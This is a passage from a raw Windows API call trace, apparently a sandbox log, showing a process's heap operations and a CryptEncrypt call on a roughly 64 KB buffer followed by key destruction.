lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.994] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e6c0 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0076.994] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0076.994] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.994] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e360 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0076.995] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0076.995] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bf8 | out: hHeap=0x650000) returned 1 [0076.995] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e360 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0076.995] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.995] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.995] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.996] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8c38 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8c38 | out: hHeap=0x650000) returned 1 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.996] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.996] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e360 [0076.996] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.997] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.997] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.998] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.998] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0076.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0076.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0076.999] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xfb13) returned 0x7c5158 [0076.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0076.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7c5158 | out: hHeap=0x650000) returned 1 [0076.999] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddb0 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0077.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0077.000] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0077.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.000] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0077.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x76e660, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.001] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0077.001] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0xfb13, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0xfb20) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.001] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0077.002] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0077.003] CharLowerBuffW (in: lpsz="byte[64289]", cchLength=0xb | out: lpsz="byte[64289]") returned 0xb [0077.006] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.006] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7c5158*, pdwDataLen=0x61e2d8*=0xfb13, dwBufLen=0xfb20 | out: pbData=0x7c5158*, pdwDataLen=0x61e2d8*=0xfb20) returned 1 [0077.009] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.014] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.014] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.023] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.024] CryptDestroyKey (hKey=0x6b8b78) returned 1 [0077.025] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.026] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.026] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 